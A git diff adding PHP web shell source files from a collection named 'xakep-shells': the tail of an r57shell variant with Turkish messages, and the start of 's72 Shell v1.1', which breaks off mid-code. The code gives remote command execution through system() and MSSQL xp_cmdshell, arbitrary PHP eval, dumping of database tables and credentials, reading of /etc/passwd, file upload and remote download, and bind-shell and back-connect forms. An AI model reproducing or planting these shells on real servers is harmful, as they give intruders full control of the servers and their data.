+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mssql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] HATA! MySQL Server ile Baglanti Kurulamiyor...";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-]HATA! MysQl Server ile baglanti Kurulamiyor";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mysql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] HATA! Database ile baglanti kurulamiyor";
+   @mssql_close($db);
+  }
+  else echo "[-] HATA! MssQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-]HATA! PostgreSQL  Server ile baglanti Kurulamiyor";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] HATA! Dump dosyalari yazilabilir degil"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
+
diff --git a/xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt b/xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt
new file mode 100644
index 0000000..fdcc41a
--- /dev/null
+++ b/xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt	
@@ -0,0 +1,141 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
+<meta name="Microsoft Theme" content="refined 011">
+</head>
+
+<body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
+
+<!--mstheme--><font face="Times New Roman">
+
+<p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
+<font color="#00FF00">Cr@zy_King&nbsp; </font>
+</a> </font></p>
+
+      <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+      <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ 
+      Server Bilgileri ]</td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      </font></b></font>
+</p>
+      <p align="center">
+        <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
+        Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        &nbsp;</font></font><p align="center"><form method="post">
+<p align="center">
+<font color="#800080">
+<br>
+</font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya 
+Kodunuzu Yaz�n :)</font><font color="#111111"><br>
+<br>
+</font>
+<font color="#FF0000">
+<textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
+<br><input type="submit" value="�al��t�r!"></font><font color="#FF0000"><br>
+&nbsp;<br></font></p>
+      </form>
+      <p align="center">
+        <font color="#FF0000">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
+        &nbsp;<p align="center">
+              <font color="#FF0000">
+              <td width="49%" height="24" bgcolor="#FCFEBA">
+              </font>
+      <p align="center"><font color="#FF0000"><b>
+      <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
+      <td width="51%" height="24" bgcolor="#FCFEBA">
+      </font></b></font>
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Y�kle!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>Dosya Zaten Bulunuyor</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
